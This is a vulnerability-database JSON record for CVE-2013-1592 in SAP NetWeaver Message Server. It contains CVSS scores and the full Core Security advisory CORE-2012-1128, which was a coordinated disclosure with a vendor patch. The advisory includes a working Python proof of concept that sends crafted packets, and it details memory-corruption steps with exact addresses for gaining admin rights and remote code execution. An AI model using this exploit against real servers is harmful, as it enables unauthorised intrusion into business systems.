"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-104",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-1592",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-1592",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "ZDI",
"id": "ZDI-12-112",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-111",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-104",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-1592",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "VULMON",
"id": "CVE-2013-1592"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007127"
},
{
"db": "NVD",
"id": "CVE-2013-1592"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \\x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. \nThe following products are affected:\nSAP Netweaver 2004s\nSAP Netweaver 7.01 SR1\nSAP Netweaver 7.02 SP06\nSAP Netweaver 7.30 SP04. \n\nThe vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nCORE-2012-1128\n\n\n1. *Advisory Information*\n\nTitle: SAP Netweaver Message Server Multiple Vulnerabilities\nAdvisory ID: CORE-2012-1128\nAdvisory URL:\nhttp://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities\nDate published: 2013-02-13\nDate of last update: 2013-02-13\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n\n2. *Vulnerability Information*\n\nClass: Improper Validation of Array Index [CWE-129], Buffer overflow\n[CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1592, CVE-2013-1593\n\n\n\n3. By sending different messages,\nthe different vulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n . Older versions are probably affected too, but they were not checked. \n\n5. *Non-vulnerable packages*\n\n . Vendor did not provide this information. \n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note 1800603 [2] regarding these issues. \n\n\n7. *Credits*\n\nVulnerability [CVE-2013-1592] was discovered by Martin Gallo and\nFrancisco Falcon, and additional research was performed by Francisco\nFalcon. Vulnerability [CVE-2013-1593] was discovered and researched by\nMartin Gallo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Fernando Miranda from Core Advisories\nTeam. \n\n\n8. *Technical Description / Proof of Concept Code*\n\nThe following python script is the main PoC that can be used to\nreproduce all vulnerabilities described below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-d\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3900)\n(options, args) = parser.parse_args()\n\nclient_string = \u0027-\u0027+\u0027 \u0027*39\nserver_name = \u0027-\u0027+\u0027 \u0027*39\n\ndef send_packet(sock, packet):\n packet = struct.pack(\"!I\", len(packet)) + packet\n sock.send(packet)\n\ndef receive(sock):\n length = sock.recv(4)\n (length, ) = struct.unpack(\"!I\", length)\n data = \"\"\n while len(data)\u003clength:\n data+= sock.recv(length)\n return (length, data)\n\ndef initialize_connection(hostname, port):\n\n # Connect\n print \"[*] Connecting to\", hostname, \"port\", port\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection.connect((hostname, port))\n\n # Send initialization packet\n print \"[*] Conected, sending login request\"\n\n init = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n init+= \u0027\\x04\u0027 # version\n init+= \u0027\\x00\u0027 # errorno\n init+= client_string # toname\n init+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n init+= \u0027\\x01\\x08\u0027 # flag / iflag (MS_LOGIN_2)\n init+= client_string # fromname\n init+= \u0027\\x00\\x00\u0027 # padd\n send_packet(connection, init)\n\n # Receive response\n print \"[*] Receiving login reply\"\n (length, data) = receive(connection)\n\n # Parsing login reply\n server_name = data[4+64:4+64+40]\n\n return connection\n\n# Main PoC body\nconnection = initialize_connection(options.hostname, options.port)\nsend_attack(connection)\n\n-----/\n\n\nIn the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. Malicious\npackets are processed by the vulnerable function \u0027_MsJ2EE_AddStatistics\u0027\nin the \u0027msg_server.exe\u0027 module. \n\nThe vulnerable function \u0027_MsJ2EE_AddStatistics\u0027 receives a pointer to a\n\u0027MSJ2EE_HEADER\u0027 struct as its third parameter, which is fully controlled\nby the attacker. This struct type is defined as follows:\n\n/-----\n00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type)\n00000000 senderclusterid dd ?\n00000004 clusterid dd ?\n00000008 serviceid dd ?\n0000000C groupid dd ?\n00000010 nodetype db ?\n00000011 db ? ; undefined\n00000012 db ? ; undefined\n00000013 db ? ; undefined\n00000014 totallength dd ?\n00000018 currentlength dd ?\n0000001C currentoffset dd ?\n00000020 totalblocks db ?\n00000021 currentblock db ?\n00000021\n00000022 db ? ; undefined\n00000023 db ? ; undefined\n00000024 messagetype dd ?\n00000028 MSJ2EE_HEADER ends\n-----/\n The \u0027_MsJ2EE_AddStatistics\u0027 function uses the \u0027serviceid\u0027 field of the\n\u0027MSJ2EE_HEADER\u0027 to calculate an index to write into the\n\u0027j2ee_stat_services\u0027 global array, without properly validating that the\nindex is within the boundaries of the array. On the other hand,\n\u0027j2ee_stat_services\u0027 is a global array of 256 elements of type\n\u0027MSJ2EE_STAT_ELEMENT\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o\n.data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... \n\n-----/\n This vulnerability can be used to corrupt arbitrary memory with\narbitrary values, with some restrictions. The following snippet shows\nthe vulnerable code within the \u0027_MsJ2EE_AddStatistics\u0027 function:\n\n/-----\nmov edi, [ebp+pJ2eeHeader]\nmov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker\ncontrols MSJ2EE_HEADER.serviceid\nxor ecx, ecx\ncmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx\nlea esi, [eax+eax*8]\nlea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index\nwithout validating array bounds\n\n-----/\n Since the \u0027serviceid\u0027 value is first multiplied by 9 and then it is\nmultiplied by 8, the granularity of the memory addresses that can be\ntargeted for memory corruption is 0x48 bytes, which is the size of the\n\u0027MSJ2EE_STAT_ELEMENT\u0027 struct:\n\n/-----\n00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)\n00000000 ; XREF:\n.data:j2ee_stat_totalr\n00000000 ; .data:j2ee_stat_servicesr\n00000000 totalMsgCount dq ? ; XREF:\n_MsJ2EE_AddStatistics+1Br\n00000000 ;\n_MsJ2EE_AddStatistics+2Fr ... \n00000008 totalMsgLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+192r\n00000008 ;\n_MsJ2EE_AddStatistics+19Br ... \n00000010 avgMsgLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+1C2w\n00000010 ;\n_MsJ2EE_AddStatistics+1C7w ... \n00000018 maxLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+161r\n00000018 ;\n_MsJ2EE_AddStatistics+16Er ... \n00000020 noP2PMessage dq ? ; XREF:\n_MsJ2EE_AddStatistics:loc_44D442w\n00000020 ;\n_MsJ2EE_AddStatistics+158w ... \n00000028 noP2PRequest dq ? ; XREF:\n_MsJ2EE_AddStatistics+144w\n00000028 ;\n_MsJ2EE_AddStatistics+14Aw ... \n00000030 noP2PReply dq ? ; XREF:\n_MsJ2EE_AddStatistics+132w\n00000030 ;\n_MsJ2EE_AddStatistics+138w ... \n00000038 noBroadcastMessage dq ? ; XREF:\n_MsJ2EE_AddStatistics:loc_44D40Dw\n00000038 ;\n_MsJ2EE_AddStatistics+123w ... \n00000040 noBroadcastRequest dq ? ; XREF:\n_MsJ2EE_AddStatistics+10Fw\n00000040 ;\n_MsJ2EE_AddStatistics+115w ... \n00000048 MSJ2EE_STAT_ELEMENT ends\n\n-----/\n However, it is possible to use different combinations of the\n\u0027flag/iflag\u0027 values in the Message Server packet to gain more precision\nover the memory addresses that can be corrupted. Different combinations\nof \u0027flag/iflag\u0027 values provide different memory corruption primitives,\nas shown below:\n\n/-----\nAt this point:\n * ESI points to an arbitrary, attacker-controlled memory address\n * EBX == 1\n\n.text:0044D359 movzx eax, [ebp+msiflag]\n.text:0044D35D sub eax, 0Ch\n.text:0044D360 jz short loc_44D37C\n.text:0044D362 sub eax, ebx\n.text:0044D364 jnz short loc_44D39D\n.text:0044D366 cmp [ebp+msflag], 2\n.text:0044D36A jnz short loc_44D374\n.text:0044D36C add [esi+40h], ebx ; iflag=0xd,\nflag=2 =\u003e add 1 to [esi+0x40]\n.text:0044D36F adc [esi+44h], ecx\n.text:0044D372 jmp short loc_44D39D\n.text:0044D374 ;\n---------------------------------------------------------------------------\n.text:0044D374\n.text:0044D374 loc_44D374: ; CODE XREF:\n_MsJ2EE_AddStatistics+7Aj\n.text:0044D374 add [esi+38h], ebx ; iflag=0xd,\nflag=1 =\u003e add 1 to [esi+0x38]\n.text:0044D377 adc [esi+3Ch], ecx\n.text:0044D37A jmp short loc_44D39D\n.text:0044D37C ;\n---------------------------------------------------------------------------\n.text:0044D37C\n.text:0044D37C loc_44D37C: ; CODE XREF:\n_MsJ2EE_AddStatistics+70j\n.text:0044D37C mov al, [ebp+msflag]\n.text:0044D37F cmp al, 3\n.text:0044D381 jnz short loc_44D38B\n.text:0044D383 add [esi+30h], ebx ; iflag=0xc,\nflag=3 =\u003e add 1 to [esi+0x30]\n.text:0044D386 adc [esi+34h], ecx\n.text:0044D389 jmp short loc_44D39D\n.text:0044D38B ;\n---------------------------------------------------------------------------\n.text:0044D38B\n.text:0044D38B loc_44D38B: ; CODE XREF:\n_MsJ2EE_AddStatistics+91j\n.text:0044D38B cmp al, 2\n.text:0044D38D jnz short loc_44D397\n.text:0044D38F add [esi+28h], ebx ; iflag=0xc,\nflag=2 =\u003e add 1 to [esi+0x28]\n.text:0044D392 adc [esi+2Ch], ecx\n.text:0044D395 jmp short loc_44D39D\n.text:0044D397 ;\n---------------------------------------------------------------------------\n.text:0044D397\n.text:0044D397 loc_44D397: ; CODE XREF:\n_MsJ2EE_AddStatistics+9Dj\n.text:0044D397 add [esi+20h], ebx ; iflag=0xc,\nflag=1 =\u003e add 1 to [esi+0x20]\n.text:0044D39A adc [esi+24h], ecx\n\n[...]\n\n-----/\n And the following code excerpt is always executed within the\n\u0027_MsJ2EE_AddStatistics\u0027 function, providing two more memory corruption\nprimitives:\n\n/-----\n.text:0044D3B7 add [esi],\nebx ;add 1 to [esi]\n.text:0044D3B9 adc dword ptr [esi+4], 0\n.text:0044D3BD mov eax,\n[edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully\ncontrolled by the attacker\n.text:0044D3C0 cdq\n.text:0044D3C1 add [esi+8],\neax ;add an arbitrary number to [esi+8]\n\n-----/\n This memory corruption vulnerability can be used by remote\nunauthenticated attackers to execute arbitrary code on vulnerable\ninstallations of SAP Netweaver, but it can also be abused to modify the\ninternal state of the vulnerable service in order to gain administrative\nprivileges within the SAP Netweaver Message Server. \n\nA client connected to the Message Server may have administrative\nprivileges or not. The Message Server holds a structure of type\n\u0027MSADM_s\u0027 for each connected client, which contains information about\nthat very connection. Relevant parts of the \u0027MSADM_s\u0027 struct type are\nshown below:\n\n/-----\n00000000 MSADM_s struc ; (sizeof=0x538, standard type)\n00000000 ; XREF: .data:dummy_clientr\n00000000 client_type dd ? ; enum MS_CLIENT_TYPE\n00000004 stat dd ? ; enum MS_STAT\n00000008 connection_ID dd ?\n0000000C status db ?\n0000000D dom db ? ; XREF: MsSFillCon+3Cw\n0000000E admin_allowed db ?\n0000000F db ? ; undefined\n00000010 name dw 40 dup(?)\n[...]\n00000534 _padding db 4 dup(?)\n00000538 MSADM_s ends\n\n-----/\n The \u0027admin_allowed\u0027 field at offset 0x0E is a boolean value that\nindicates whether the connected client has administrative privileges or\nnot. When a new client connects, the \u0027MsSLoginClient\u0027 function of the\nMessage Server sets the proper value for the \u0027admin_allowed\u0027 field in\nthe \u0027MSADM_s\u0027 struct instance associated with that client:\n\n/-----\n.text:004230DC\nloc_4230DC: ; CODE\nXREF: MsSLoginClient+AAAj\n.text:004230DC\n ; MsSLoginClient+B26j\n.text:004230DC cmp byte ptr [edi+0Eh],\n0 ; privileged client?\n.text:004230E0 jnz short\nloc_4230EA ; if yes, jump\n.text:004230E2 mov al, byte ptr\nms_admin_allowed ; otherwise, grab the value of the\n\"ms_admin_allowed\" global variable... \n.text:004230E7 mov [edi+0Eh],\nal ; ...and save it to MSADM_s.admin_allowed\n\n-----/\n So if we manage to overwrite the value of the \u0027ms_admin_allowed\u0027 global\nvariable with a value different than 0, then we can grant administrative\nprivileges to our unprivileged connections. In SAP Netweaver\n\u0027msg_server.exe\u0027 v7200.70.18.23869, the \u0027ms_admin_allowed\u0027 global\nvariable is located at \u00270x008f17f0\u0027:\n\n/-----\n.data:008F17F0 ; int ms_admin_allowed\n.data:008F17F0 ms_admin_allowed dd ? ; DATA XREF:\nMsSSetMonitor+7Ew\n.data:008F17F0 ; MsSLoginClient+B62r\n\n-----/\n And the \u0027j2ee_stat_services\u0027 global array, which is the array that can\nbe indexed outside its bounds, is located at \u00270x0090b9e0\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0 ; DATA XREF:\n_MsJ2EE_AddStatistics+24o\n.data:0090B9E0 ;\n_MsJ2EE_AddStatistics+4Co ... \n\n-----/\n So, by providing \u0027MSJ2EE_HEADER.serviceid == 0x038E3315\u0027, we will be\ntargeting \u00270x008F17C8\u0027 as the base address for memory corruption. Having\nin mind the different memory corruption primitives based on combinations\nof \u0027flag/iflag\u0027 fields described above, by specifying \u0027iflag == 0xC\u0027 and\n\u0027flag == 0x2\u0027 in our Message Server packet we will be able to add 1 to\n\u0027[0x008F17C8+0x28]\u0027, effectively overwriting the contents of\n\u00270x008F17F0\u0027 (\u0027ms_admin_allowed\u0027). After overwriting \u0027ms_admin_allowed\u0027,\nall of our future connections will have administrative privileges within\nthe Message Server. \n\nAfter gaining administrative privileges for our future connections,\nthere are at least two possible paths of exploitation:\n\n 1. Of\ncourse it is not mandatory to have administrative privileges in order to\noverwrite function pointers, but considering the limitation of\ntargetable addresses imposed by the little granularity of the memory\ncorruption, some of the most handy-to-exploit function pointers happened\nto be accessible just for administrative connections. \n 2. Modify the configuration and behavior of the server. That includes\nchanging Message Server\u0027s runtime parameters and enabling Monitor Mode\nin the affected server. \n\n8.1.1. *Gaining remote code execution by overwriting function pointers*\n\nHaving in mind that the granularity of the memory addresses that can be\ntargeted for memory corruption is not that flexible (0x48 bytes) and the\nlimited memory corruption primitives available, it takes some effort to\nfind a function pointer that can be overwritten with a useful value and\nwhich can be later triggered with a network packet. \n\nOne possibility is to overwrite one of the function pointers which are\nin charge of handling the modification of Message Server parameters:\n\n/-----\n.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]\n\n; function pointers associated to the modification of the \"ms/max_sleep\"\nparameter\n.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER\n\u003coffset aMsMax_sleep, \\\n.data:0087DED0 offset\nMsSTestInteger, \\ ; \"rdisp/TRACE_PATTERN_2\"\n.data:0087DED0 offset\nMsSSetMaxSleep\u003e\n\n; function pointers associated to the modification of the \"ms/max_vhost\"\nparameter\n.data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER \u003coffset\naMsMax_vhost, \\\n.data:0087DED0 offset\nMsSTestInteger, \\ ;\u003c-- we can overwrite this one\n.data:0087DED0 offset\nMsSSetMaxVirtHost\u003e\n\n[...]\n\n-----/\n By providing \u0027MSJ2EE_HEADER.serviceid == 0x038E1967\u0027 we can target\n\u00270x0087DED8\u0027 as the base address for memory corruption. In this case we\ncan use the memory corruption primitive at address \u00270x0044D3C1\u0027 that\nalways gets executed, which will allow us to add an arbitrary number\n(the value of \u0027MSJ2EE_HEADER.totallength\u0027) to \u0027[0x0087DED8+8]\u0027\neffectively overwriting the function pointer shown above\n(\u0027ms_changeable_parameter[1].set\u0027). \n\nAfter that we need to send a \u0027MS_SET_PROPERTY\u0027 request, specifying\n\u0027ms/max_vhost\u0027 as the name of the property to be changed. This\n\u0027MS_SET_PROPERTY\u0027 packet will make our overwritten function pointer to\nbe called from the \u0027MsSChangeParam\u0027 function:\n\n/-----\n.text:00404DB3 loc_404DB3: ; CODE XREF:\nMsSChangeParam+CDj\n.text:00404DB3 lea esi, [edi+edi*2]\n.text:00404DB6 mov edi, [ebp+pvalue]\n.text:00404DB9 add esi, esi\n.text:00404DBB mov edx,\nms_changeable_parameter.test[esi+esi]\n.text:00404DC2 add esi, esi\n.text:00404DC4 push edi\n.text:00404DC5 push pname\n.text:00404DC6 call edx ; call our\noverwritten function pointer\n\n-----/\n\u0027MS_SET_PROPERTY\u0027 packets will be ignored by the Message Server if the\nrequesting client does not have administrative privileges, so it is\nnecessary to gain administrative privileges as explained above before\nusing the memory corruption vulnerability to overwrite one of the\nfunction pointers in the \u0027ms_changeable_parameter\u0027 global array. \n\n\n8.1.2. *Modify the configuration and behavior of the server*\n\nAfter gaining administrative privileges for our connections, it is\npossible to perform \u0027MS_SET_PROPERTY\u0027 packets against the Message Server\nin order to modify its configuration and behavior. That makes possible,\nfor example, to add virtual hosts to the load balancer, or to enable\nMonitor Mode [3] (transaction SMMS) on the affected server. Enabling\nMonitor Mode takes two steps:\n\n 1. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/monitor\"\u0027, property \u0027value == 1\u0027. \n 2. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/admin_port\"\u0027, property \u0027value == 3535\u0027 (or any other arbitrary port\nnumber). \nAfter sending the second \u0027MS_SET_PROPERTY\u0027 packet, the SAP Netweaver\nMessage Server will start listening on the specified port, waiting for\nconnections from instances of the msmon.exe monitoring program [4]. \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n print \"[*] Sending crash packet\"\n crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n crash+= \u0027\\x04\u0027 # version\n crash+= \u0027\\x00\u0027 # errorno\n crash+= server_name # toname\n crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n crash+= \u0027\\x04\\x0d\u0027 # flag/iflag\n crash+= client_string # fromname\n crash+= \u0027\\x00\\x00\u0027 # padd\n\n crash+=\n\"ABCDEFGH\"+\"\\x01\\x00\\x00\\x00\"+\"MNOPQRSTUVWXYZ0123\"+\"\\x01\"+\"56789abcd\"\n crash+= \"\\x00\\x00\\x00\\x01\"\n crash+= \"\\xff\\xff\\xff\\xff\"\n crash+= \"\\x00\\x00\\x00\\x00\"\n send_packet(connection, crash)\n\n print \"[*] Crash sent !\"\n-----/\n\n\n\n8.2. \nMalicious packets are processed by the vulnerable function \u0027WRITE_C\u0027 in\nthe \u0027msg_server.exe\u0027 module. \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n print \"[*] Sending crash packet\"\n crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n crash+= \u0027\\x04\u0027 # version\n crash+= \u0027\\x00\u0027 # errorno\n crash+= server_name # toname\n crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n crash+= \u0027\\x04\\x05\u0027 # flag/iflag\n crash+= client_string # fromname\n crash+= \u0027\\x00\\x00\u0027 # padd\n\n crash+= \"AD-EYECATCH\\x00\"\n crash+= \"\\x01\\x01\"\n crash+= \"%11d\" % 104\n crash+= \"%11d\" % 1\n crash+= \"\\x15\\x00\\x00\\x00\"\n crash+= \"\\x20\\x00\\x00\\xc8\"\n crash+= \"LALA\" + \u0027 \u0027*(20-4)\n crash+= \"LOLO\" + \u0027 \u0027*(40-4)\n crash+= \" \"*36\n send_packet(connection, crash)\n\n print \"[*] Crash sent !\"\n\n-----/\n\n\n\n9. *Report Timeline*\n. 2012-12-10:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for January 22nd,\n2013. 2012-12-10:\nCore sends an advisory draft with technical details and a PoC. 2012-12-11:\nThe SAP team confirms the reception of the issue. 2012-12-21:\nSAP notifies that they concluded the analysis of the reported issues and\nconfirms two out of the five vulnerabilities. Vendor also notifies that\nthe other three reported issues were already fixed in February, 2012. \nVendor also notifies that the necessary code changes are being done and\nextensive tests will follow. The corresponding security note and patches\nare planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21:\nCore re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28:\nSAP notifies Core that they will be contacted if tests fails in order to\nre-schedule the advisory publication. 2013-01-22:\nFirst release date missed. 2013-01-28:\nSAP notifies that they are still confident with releasing a security\nnote and patches on Feb 12th as planned. 2013-01-29:\nCore acknowledges receiving the information and notifies that everything\nis ready for public disclosing on Feb 12th. Core also asks additional\ninformation regarding the patched vulnerabilities mentioned in\n[2012-12-21], including links to security bulletin, CVEs, and patches in\norder to verify if those patches effectively fix the reported flaws. 2013-02-01:\nSAP notifies that the patched vulnerabilities mentioned in [2012-12-21]\nwere reported in [5] and no CVE were assigned to them. Those\nvulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06:\nCore notifies that the patched vulnerabilities will be removed from the\nadvisory and asks additional information regarding the affected and\npatched version numbers. 2013-02-01:\nSAP notifies that the security note 1800603 will be released and that\nnote will provide further information regarting this vulnerability. 2013-02-13:\nAdvisory CORE-2012-1128 published. \n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx. \n[2] SAP Security note Feb 2013\nhttps://service.sap.com/sap/support/notes/1800603. \n[3]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. \n\n[4]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. \n\n[5] SAP Security notes Feb 2012\nhttps//service.sap.com/sap/support/notes/1649840. \n[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. \n[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. \n[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code\nExecution Vulnerability\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-104\nJune 27, 2012\n\n- -- CVE ID:\n\n\n- -- CVSS:\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\n\n- -- Affected Vendors:\nSAP\n\n- -- Affected Products:\nSAP NetWeaver\n\n\n- -- TippingPoint(TM) IPS Customer Protection:\nTippingPoint IPS customers have been protected against this\nvulnerability by Digital Vaccine protection filter ID 12407. \n\n\n- -- Vendor Response:\nSAP has issued an update to correct this vulnerability. More details can be\nfound 